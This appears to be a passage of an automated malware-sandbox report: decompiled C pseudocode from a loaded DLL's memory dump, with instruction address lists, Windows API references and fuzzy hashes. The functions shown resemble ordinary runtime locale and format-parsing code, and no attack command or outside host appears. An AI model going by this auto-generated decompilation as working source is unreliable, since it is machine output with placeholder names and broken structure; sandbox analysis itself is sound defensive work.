									__eflags = _t211 - 0x58;
									if(_t211 != 0x58) {
										goto L47;
									}
									goto L46;
								}
								_t169 =  *(_t218 + 0x1c) >> 6;
								__eflags = 1 & _t169;
								if((1 & _t169) == 0) {
									__eflags =  *(_t218 + 0x1c) & 1;
									if(( *(_t218 + 0x1c) & 1) == 0) {
										_t171 =  *(_t218 + 0x1c) >> 1;
										__eflags = 1 & _t171;
										if((1 & _t171) != 0) {
											_v20 = 0x20;
											_t187 = 1;
											_v28 = 1;
										}
										goto L44;
									}
									_v20 = 0x2b;
									L41:
									_t187 = 1;
									_v28 = 1;
									goto L44;
								}
								_v20 = 0x2d;
								goto L41;
							}
							L11:
							_t120 = 0;
							goto L105;
						}
						_t173 = _t118;
						__eflags = _t173;
						if(__eflags == 0) {
							L28:
							_t119 = E6DA8E41E(_t218, __eflags, _t179);
							goto L10;
						}
						__eflags = _t173 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_t119 = E6DA8E59B(_t218, __eflags);
						goto L10;
					}
					if(__eflags == 0) {
						_t119 = E6DA8F77A(__ecx);
						goto L10;
					}
					__eflags = _t117 - 0x67;
					if(_t117 <= 0x67) {
						L29:
						_t119 = E6DA8F4BA(_t179, _t218);
						goto L10;
					}
					__eflags = _t117 - 0x69;
					if(_t117 == 0x69) {
						L27:
						_t4 = _t218 + 0x1c;
						 *_t4 =  *(_t218 + 0x1c) | 0x00000010;
						__eflags =  *_t4;
						goto L28;
					}
					__eflags = _t117 - 0x6e;
					if(_t117 == 0x6e) {
						_t119 = E6DA8F6D9(__ecx, __edx);
						goto L10;
					}
					__eflags = _t117 - 0x6f;
					if(_t117 != 0x6f) {
						goto L11;
					}
					_t119 = E6DA8F75D(__ecx);
					goto L10;
				}
				if(_t222 == 0) {
					goto L27;
				}
				_t223 = _t117 - _t183;
				if(_t223 > 0) {
					_t175 = _t117 - 0x5a;
					__eflags = _t175;
					if(_t175 == 0) {
						_t119 = E6DA8F460(__ecx);
						goto L10;
					}
					_t176 = _t175 - 7;
					__eflags = _t176;
					if(_t176 == 0) {
						goto L29;
					}
					__eflags = _t176;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t119 = E6DA8F644(_t179, _t218, _t208, __eflags, _t179);
					goto L10;
				}
				if(_t223 == 0) {
					_push(1);
					goto L13;
				}
				if(_t117 == 0x41) {
					goto L29;
				}
				if(_t117 == 0x43) {
					goto L17;
				}
				if(_t117 <= 0x44) {
					goto L11;
				}
				if(_t117 <= 0x47) {
					goto L29;
				}
				if(_t117 != 0x53) {
					goto L11;
				}
				goto L9;
			}




























































              0x6da8f07e
              0x6da8f07e
              0x6da8f086
              0x6da8f08d
              0x6da8f092
              0x6da8f094
              0x6da8f098
              0x6da8f09b
              0x6da8f09c
              0x6da8f0a0
              0x6da8f0a3
              0x6da8f116
              0x6da8f119
              0x6da8f169
              0x6da8f169
              0x6da8f16c
              0x6da8f0d2
              0x6da8f0d4
              0x6da8f0d9
              0x6da8f0db
              0x6da8f187
              0x6da8f18a
              0x6da8f3fc
              0x6da8f3fc
              0x6da8f3fe
              0x6da8f40b
              0x6da8f40b
              0x6da8f195
              0x6da8f199
              0x6da8f19d
              0x6da8f19f
              0x6da8f1a2
              0x6da8f1a5
              0x6da8f1a7
              0x6da8f1db
              0x6da8f1db
              0x6da8f1de
              0x6da8f1e1
              0x6da8f1e8
              0x6da8f1f0
              0x6da8f1f2
              0x6da8f1f6
              0x6da8f1f6
              0x6da8f1f9
              0x6da8f202
              0x6da8f202
              0x6da8f204
              0x6da8f204
              0x6da8f206
              0x6da8f20c
              0x6da8f20c
              0x6da8f211
              0x6da8f214
              0x6da8f21f
              0x6da8f221
              0x6da8f222
              0x6da8f222
              0x6da8f226
              0x6da8f226
              0x6da8f229
              0x6da8f22c
              0x6da8f232
              0x6da8f234
              0x6da8f238
              0x6da8f239
              0x6da8f23c
              0x6da8f29c
              0x6da8f29c
              0x6da8f29f
              0x6da8f2ad
              0x6da8f2b3
              0x6da8f2b8
              0x6da8f2bd
              0x6da8f2c0
              0x6da8f2c2
              0x6da8f328
              0x6da8f328
              0x6da8f32c
              0x6da8f390
              0x6da8f390
              0x6da8f3a0
              0x6da8f3a5
              0x6da8f3a5
              0x6da8f3a7
              0x6da8f3a9
              0x6da8f3fb
              0x6da8f3fb
              0x00000000
              0x6da8f3fb
              0x6da8f3ae
              0x6da8f3b1
              0x6da8f3b3
              0x00000000
              0x00000000
              0x6da8f3b5
              0x6da8f3b8
              0x6da8f3ba
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8f3bc
              0x6da8f3bc
              0x6da8f3bf
              0x6da8f3c4
              0x6da8f3c7
              0x6da8f3dc
              0x6da8f3df
              0x6da8f3e1
              0x6da8f3e8
              0x6da8f3eb
              0x6da8f3ed
              0x6da8f3ed
              0x6da8f3ef
              0x6da8f3c9
              0x6da8f3c9
              0x6da8f3cd
              0x6da8f3d2
              0x6da8f3d2
              0x6da8f3cf
              0x6da8f3cf
              0x6da8f3cf
              0x6da8f3d5
              0x6da8f3d5
              0x6da8f3f1
              0x6da8f3f4
              0x00000000
              0x00000000
              0x6da8f3f6
              0x6da8f3f7
              0x6da8f3f9
              0x00000000
              0x00000000
              0x00000000
              0x6da8f3f9
              0x00000000
              0x6da8f3bc
              0x6da8f32e
              0x6da8f331
              0x00000000
              0x00000000
              0x6da8f333
              0x6da8f336
              0x6da8f339
              0x6da8f348
              0x6da8f34f
              0x6da8f353
              0x6da8f358
              0x6da8f35b
              0x6da8f35d
              0x00000000
              0x00000000
              0x6da8f35f
              0x6da8f362
              0x00000000
              0x00000000
              0x6da8f364
              0x6da8f375
              0x6da8f37d
              0x6da8f380
              0x6da8f381
              0x6da8f384
              0x6da8f387
              0x00000000
              0x00000000
              0x00000000
              0x6da8f389
              0x6da8f38b
              0x00000000
              0x6da8f38b
              0x6da8f2c4
              0x6da8f2c7
              0x6da8f2ca
              0x00000000
              0x00000000
              0x6da8f2cc
              0x6da8f2cf
              0x6da8f2d2
              0x6da8f2d4
              0x00000000
              0x00000000
              0x6da8f2d6
              0x6da8f2d8
              0x6da8f2db
              0x6da8f2db
              0x6da8f2dd
              0x6da8f2e0
              0x6da8f2e5
              0x6da8f2e8
              0x6da8f2ff
              0x6da8f303
              0x6da8f30a
              0x6da8f30d
              0x6da8f30f
              0x6da8f30f
              0x6da8f311
              0x6da8f2ea
              0x6da8f2ea
              0x6da8f2ec
              0x6da8f2f0
              0x6da8f2f5
              0x6da8f2f5
              0x6da8f2f2
              0x6da8f2f2
              0x6da8f2f2
              0x6da8f2f8
              0x6da8f2f8
              0x6da8f313
              0x6da8f316
              0x00000000
              0x00000000
              0x6da8f31b
              0x6da8f31c
              0x6da8f31f
              0x6da8f321
              0x00000000
              0x00000000
              0x00000000
              0x6da8f321
              0x6da8f323
              0x6da8f326
              0x6da8f326
              0x00000000
              0x6da8f326
              0x6da8f23e
              0x6da8f240
              0x00000000
              0x00000000
              0x6da8f242
              0x6da8f245
              0x6da8f247
              0x6da8f247
              0x6da8f24d
              0x6da8f256
              0x6da8f259
              0x6da8f26f
              0x6da8f274
              0x6da8f27f
              0x6da8f282
              0x6da8f288
              0x6da8f288
              0x6da8f28a
              0x6da8f25b
              0x6da8f25b
              0x6da8f25f
              0x6da8f264
              0x6da8f264
              0x6da8f261
              0x6da8f261
              0x6da8f261
              0x6da8f267
              0x6da8f267
              0x6da8f28d
              0x6da8f290
              0x00000000
              0x00000000
              0x6da8f292
              0x6da8f293
              0x6da8f295
              0x00000000
              0x00000000
              0x00000000
              0x6da8f295
              0x6da8f297
              0x6da8f29a
              0x6da8f29a
              0x00000000
              0x6da8f29a
              0x6da8f216
              0x6da8f219
              0x00000000
              0x00000000
              0x00000000
              0x6da8f21b
              0x6da8f208
              0x6da8f20a
              0x00000000
              0x00000000
              0x00000000
              0x6da8f20a
              0x6da8f1fb
              0x6da8f1fd
              0x6da8f200
              0x00000000
              0x00000000
              0x00000000
              0x6da8f200
              0x6da8f1f4
              0x00000000
              0x6da8f1f4
              0x6da8f1e3
              0x6da8f1e6
              0x00000000
              0x00000000
              0x00000000
              0x6da8f1e6
              0x6da8f1ac
              0x6da8f1af
              0x6da8f1b1
              0x6da8f1b9
              0x6da8f1bc
              0x6da8f1cc
              0x6da8f1ce
              0x6da8f1d0
              0x6da8f1d2
              0x6da8f1d6
              0x6da8f1d8
              0x6da8f1d8
              0x00000000
              0x6da8f1d0
              0x6da8f1be
              0x6da8f1c2
              0x6da8f1c2
              0x6da8f1c4
              0x00000000
              0x6da8f1c4
              0x6da8f1b3
              0x00000000
              0x6da8f1b3
              0x6da8f0e1
              0x6da8f0e1
              0x00000000
              0x6da8f0e1
              0x6da8f173
              0x6da8f173
              0x6da8f176
              0x6da8f147
              0x6da8f14a
              0x00000000
              0x6da8f14a
              0x6da8f178
              0x6da8f17b
              0x00000000
              0x00000000
              0x6da8f181
              0x6da8f0ea
              0x6da8f0ec
              0x00000000
              0x6da8f0ec
              0x6da8f11b
              0x6da8f15f
              0x00000000
              0x6da8f15f
              0x6da8f11d
              0x6da8f120
              0x6da8f151
              0x6da8f153
              0x00000000
              0x6da8f153
              0x6da8f122
              0x6da8f125
              0x6da8f143
              0x6da8f143
              0x6da8f143
              0x6da8f143
              0x00000000
              0x6da8f143
              0x6da8f127
              0x6da8f12a
              0x6da8f13c
              0x00000000
              0x6da8f13c
              0x6da8f12c
              0x6da8f12f
              0x00000000
              0x00000000
              0x6da8f133
              0x00000000
              0x6da8f133
              0x6da8f0a5
              0x00000000
              0x00000000
              0x6da8f0ab
              0x6da8f0ad
              0x6da8f0f3
              0x6da8f0f3
              0x6da8f0f6
              0x6da8f10f
              0x00000000
              0x6da8f10f
              0x6da8f0f8
              0x6da8f0f8
              0x6da8f0fb
              0x00000000
              0x00000000
              0x6da8f0fe
              0x6da8f101
              0x00000000
              0x00000000
              0x6da8f103
              0x6da8f106
              0x00000000
              0x6da8f106
              0x6da8f0af
              0x6da8f0e8
              0x00000000
              0x6da8f0e8
              0x6da8f0b4
              0x00000000
              0x00000000
              0x6da8f0bd
              0x00000000
              0x00000000
              0x6da8f0c2
              0x00000000
              0x00000000
              0x6da8f0c7
              0x00000000
              0x00000000
              0x6da8f0d0
              0x00000000
              0x00000000
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 6ffe0e9a259b114ebf205106e5d05e75eecdf215e03385ce746514196cb1b6b3
              • Instruction ID: 7cb8c680aa0b389c44b8a10ce5ac70fbc158d2b0bccbe362f49cb5acac620ba1
              • Opcode Fuzzy Hash: 6ffe0e9a259b114ebf205106e5d05e75eecdf215e03385ce746514196cb1b6b3
              • Instruction Fuzzy Hash: 26C1FE38A0C74B8FCB11CE68C48067ABBB1FB46314F14865DDDA297292E335A8C6CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C614 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
              Download Yara Rule
              C-Code - Quality: 64%
              			E6DA9C614(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				void* _t23;
				void* _t30;
				void* _t32;
				signed int _t41;
				signed int* _t47;
				int _t49;
				signed int _t50;

				_t46 = __edx;
				_t15 =  *0x6dab3014; // 0x6c4e8ceb
				_v8 = _t15 ^ _t50;
				_t48 = _a4;
				_t32 = E6DA92BDC(__ecx, __edx, _a4);
				_t47 =  *(E6DA92BDC(__ecx, __edx, _a4) + 0x34c);
				_t49 = E6DA9C6E9(_t48);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E6DA990B4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t41 =  *(_t32 + 0x60);
					if(_t23 != 0) {
						if(_t41 == 0 &&  *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
							_t30 = E6DA990B4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
							if(_t30 == 0) {
								_push(_t47);
								_push(_t30);
								goto L9;
							}
						}
					} else {
						if(_t41 != 0) {
							L10:
							 *_t47 =  *_t47 | 0x00000004;
							_t47[1] = _t49;
							_t47[2] = _t49;
						} else {
							_push(_t47);
							_push(1);
							L9:
							_push(_t49);
							if(E6DA9C843() != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t47 >> 2) & 0x00000001;
				} else {
					 *_t47 =  *_t47 & _t21;
					_t27 = _t21 + 1;
				}
				return E6DA89B91(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
			}


















              0x6da9c614
              0x6da9c61f
              0x6da9c626
              0x6da9c62b
              0x6da9c634
              0x6da9c63c
              0x6da9c64b
              0x6da9c657
              0x6da9c668
              0x6da9c670
              0x6da9c681
              0x6da9c688
              0x6da9c68d
              0x6da9c69a
              0x6da9c6ab
              0x6da9c6b4
              0x6da9c6b6
              0x6da9c6b7
              0x00000000
              0x6da9c6b7
              0x6da9c6b4
              0x6da9c68f
              0x6da9c691
              0x6da9c6c5
              0x6da9c6c5
              0x6da9c6c8
              0x6da9c6cb
              0x6da9c693
              0x6da9c693
              0x6da9c694
              0x6da9c6b8
              0x6da9c6b8
              0x6da9c6c3
              0x00000000
              0x00000000
              0x6da9c6c3
              0x6da9c691
              0x6da9c6d5
              0x6da9c672
              0x6da9c672
              0x6da9c674
              0x6da9c674
              0x6da9c6e6

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C668
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID:
              • API String ID: 3736152602-0
              • Opcode ID: 0b1efd6c4e5d462103036b2c40a1453ab499bd91a6bb0c4982a5da03858475ec
              • Instruction ID: 2b4be8fd2c0136fa7577e56019ef6d551198b20ad5dcb9e06efff2f5c42ea140
              • Opcode Fuzzy Hash: 0b1efd6c4e5d462103036b2c40a1453ab499bd91a6bb0c4982a5da03858475ec
              • Instruction Fuzzy Hash: EB21B07666D607ABEB189F29CD41ABA73F8EF09314F04607AFF01CA140EB349980DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C29B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 91%
              			E6DA9C29B(void* __ecx, void* __edx, signed int* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E6DA92BDC(__ecx, __edx, _t53);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t54 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t47 = E6DA9C395( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E6DA9C3C1, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}



















              0x6da9c2a8
              0x6da9c2ae
              0x6da9c2af
              0x6da9c2b2
              0x6da9c2b5
              0x6da9c2b5
              0x6da9c2b8
              0x6da9c2ba
              0x6da9c2c8
              0x6da9c2ce
              0x6da9c2d1
              0x6da9c2d4
              0x6da9c2d4
              0x6da9c2d7
              0x6da9c2d9
              0x6da9c2e2
              0x6da9c2ed
              0x6da9c2f0
              0x6da9c2f6
              0x6da9c301
              0x6da9c301
              0x6da9c30a
              0x6da9c30d
              0x6da9c315
              0x6da9c31b
              0x6da9c31f
              0x6da9c324
              0x6da9c328
              0x6da9c32d
              0x6da9c32f
              0x00000000
              0x6da9c32f
              0x6da9c335

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • EnumSystemLocalesW.KERNEL32(6DA9C3C1,00000001,00000000,?,-00000050,?,6DA9C9F2,00000000,?,?,?,00000055,?), ref: 6DA9C30D
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 1323dc192890057d6236e34f2b70ec53e58cd2ffb8a929a4ac83735088091412
              • Instruction ID: 27324880d47381c7e6ec9772b7731a59212a62e9944619fc7d8b4253cc708bfc
              • Opcode Fuzzy Hash: 1323dc192890057d6236e34f2b70ec53e58cd2ffb8a929a4ac83735088091412
              • Instruction Fuzzy Hash: EF11293B2187015FDB089F39C8906BABBE1FF84318B19442CD9864BA40D7756583C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C843 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
              Download Yara Rule
              C-Code - Quality: 87%
              			E6DA9C843(signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t25;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_push(_t25);
				_t8 = E6DA92BDC(_t15, _t21, _t25);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E6DA9C395( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

















              0x6da9c848
              0x6da9c849
              0x6da9c84b
              0x6da9c850
              0x6da9c853
              0x6da9c877
              0x6da9c8ab
              0x6da9c8ab
              0x6da9c879
              0x6da9c87c
              0x6da9c8a6
              0x6da9c8a8
              0x6da9c884
              0x6da9c884
              0x6da9c887
              0x6da9c88a
              0x6da9c88a
              0x6da9c88d
              0x6da9c890
              0x6da9c8a4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da9c8a4
              0x6da9c87c
              0x6da9c8b0

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6DA9C5DD,00000000,00000000,?), ref: 6DA9C86F
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID:
              • API String ID: 3736152602-0
              • Opcode ID: b2a1ddc1532976e3a4ed4a0481dfec627f1e8f2baa7751b4fc9aa3583d358b7a
              • Instruction ID: 45475d91b81ef87bf4bcfdd182291cd14c7f401aad641c6a040efb80d78eab20
              • Opcode Fuzzy Hash: b2a1ddc1532976e3a4ed4a0481dfec627f1e8f2baa7751b4fc9aa3583d358b7a
              • Instruction Fuzzy Hash: 4BF0F976528617ABDB144A20C805BBA77E8EF80754F098424DD16AB180EA74FAC2C690
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C1A9 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
              Download Yara Rule
              C-Code - Quality: 87%
              			E6DA9C1A9(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t13;
				signed int _t17;
				signed int* _t39;
				int _t41;
				signed int _t42;

				_t38 = __edx;
				_t11 =  *0x6dab3014; // 0x6c4e8ceb
				_v8 = _t11 ^ _t42;
				_t40 = _a4;
				_t13 = E6DA92BDC(__ecx, __edx, _a4);
				_t26 = _t13;
				_t39 =  *(E6DA92BDC(__ecx, __edx, _a4) + 0x34c);
				_t41 = E6DA9C6E9(_t40);
				asm("sbb ecx, ecx");
				_t17 = GetLocaleInfoW(_t41, ( ~( *(_t13 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				if(_t17 != 0) {
					if(E6DA990B4(_t39, _t41,  *((intOrPtr*)(_t26 + 0x54)),  &_v248) == 0 && E6DA9C81E(_t41) != 0) {
						 *_t39 =  *_t39 | 0x00000004;
						_t39[2] = _t41;
						_t39[1] = _t41;
					}
					_t23 =  !( *_t39 >> 2) & 0x00000001;
				} else {
					 *_t39 =  *_t39 & _t17;
					_t23 = _t17 + 1;
				}
				return E6DA89B91(_t23, _t26, _v8 ^ _t42, _t38, _t39, _t41);
			}















              0x6da9c1a9
              0x6da9c1b4
              0x6da9c1bb
              0x6da9c1c0
              0x6da9c1c4
              0x6da9c1c9
              0x6da9c1d1
              0x6da9c1e0
              0x6da9c1ec
              0x6da9c1fd
              0x6da9c205
              0x6da9c21f
              0x6da9c22c
              0x6da9c22f
              0x6da9c232
              0x6da9c232
              0x6da9c23c
              0x6da9c207
              0x6da9c207
              0x6da9c209
              0x6da9c209
              0x6da9c24d

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6DA9C1FD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID: utf8
              • API String ID: 3736152602-905460609
              • Opcode ID: 78315a3d9f4b81cc6c699cb4c00caa2d1cc33c7647b6b5bbfa870a75732e1915
              • Instruction ID: 64469b11121b4654dac34e423e4293ba09fc8efd14742afef7c1d7d6c0ba9717
              • Opcode Fuzzy Hash: 78315a3d9f4b81cc6c699cb4c00caa2d1cc33c7647b6b5bbfa870a75732e1915
              • Instruction Fuzzy Hash: B4F0F472628205AFC714AF74D945AFA33E8DF49314F06407AA602DB240EB78AD458750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C336 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA9C336(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = E6DA92BDC(__ecx, __edx, _t26);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t27 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t27 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E6DA9C395( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
				EnumSystemLocalesW(E6DA9C614, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}












              0x6da9c343
              0x6da9c349
              0x6da9c34a
              0x6da9c34d
              0x6da9c350
              0x6da9c350
              0x6da9c353
              0x6da9c355
              0x6da9c363
              0x6da9c366
              0x6da9c369
              0x6da9c374
              0x6da9c374
              0x6da9c37d
              0x6da9c380
              0x6da9c386
              0x6da9c38c
              0x6da9c38e
              0x00000000
              0x6da9c38e
              0x6da9c394

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
